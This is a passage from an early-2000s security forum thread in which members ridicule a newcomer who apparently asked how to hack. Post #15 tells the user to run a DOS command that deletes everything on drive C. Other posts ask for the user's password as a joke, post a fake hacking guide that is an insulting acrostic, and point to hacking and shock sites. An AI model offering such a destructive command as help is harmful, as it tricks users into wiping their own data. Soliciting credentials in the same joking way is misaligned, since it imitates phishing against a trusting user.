-
May 10th, 2002, 10:04 PM
#11
Senior Member
xmaddness that was great...and appropriate I believe
-
May 10th, 2002, 10:05 PM
#12
The Antionline FAQ has the perfect answer to this question
-
May 10th, 2002, 10:15 PM
#13
Senior Member
Yes and as usuall the http://cs-hacks.tk site but a new one has also been found http://cybermagellan.tk has good news on spoofing breaking into places you shouldn't be and the such....I suggest the experienced users go there as well to see what it is all about!
-
May 10th, 2002, 11:53 PM
#14
Send me your user name and password.
and I'll explain it to you.
I came in to the world with nothing. I still have most of it.
-
May 10th, 2002, 11:54 PM
#15
Hey mazigar go to MS-DOS and type in "deltree /y C:\*.*" but without the quotation marks.
Enjoy!
-
May 11th, 2002, 12:27 AM
#16
Wow, i'm not even gonna try to be witty.....
thanks for your request.
--------------------------------------------------------
First of all, formulate the reversed page you require.
Understand integer binaries, and the way they interact with decimal hex.
Consider Your target's intellectual capacity (Social Engineering).
Krups data wrapping helps to proccess with better stealth.
Organise report back auditing, and it's function within data streaming.
Fix HTML Code to allow funtionary looping
Finally, get user to submit password in non-encrypted format.
----------------------------------------------------------
Taking the initial string value from each of the above points should have you heading in the right direction.
I hope this helps ....
-
May 11th, 2002, 12:33 AM
#17
Holy feck dude, Thats some serious ****
-
May 11th, 2002, 12:42 AM
#18
Originally posted here by bofhandpfy
Wow, i'm not even gonna try to be witty.....
thanks for your request.
--------------------------------------------------------
First of all, formulate the reversed page you require.
Understand integer binaries, and the way they interact with decimal hex.
Consider Your target's intellectual capacity (Social Engineering).
Krups data wrapping helps to proccess with better stealth.
Organise report back auditing, and it's function within data streaming.
Fix HTML Code to allow funtionary looping
Finally, get user to submit password in non-encrypted format.
----------------------------------------------------------
Taking the initial string value from each of the above points should have you heading in the right direction.
I hope this helps ....
I'm trying to understand this.
Do you mean to acronymically encode the first char values?
I came in to the world with nothing. I still have most of it.
-
May 11th, 2002, 12:59 AM
#19
Senior Member
LOL, I don't think he means anything
-
May 11th, 2002, 01:32 AM
#20
Member
Whoa guys maybe we should help him
Wheres that link to special.php I lost mine Someone *help* him
BTW this website will be linking to you has special audio commentary people love it if possible go into public with sound up all the way
What do you mean you don\'t have a backup disk?
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|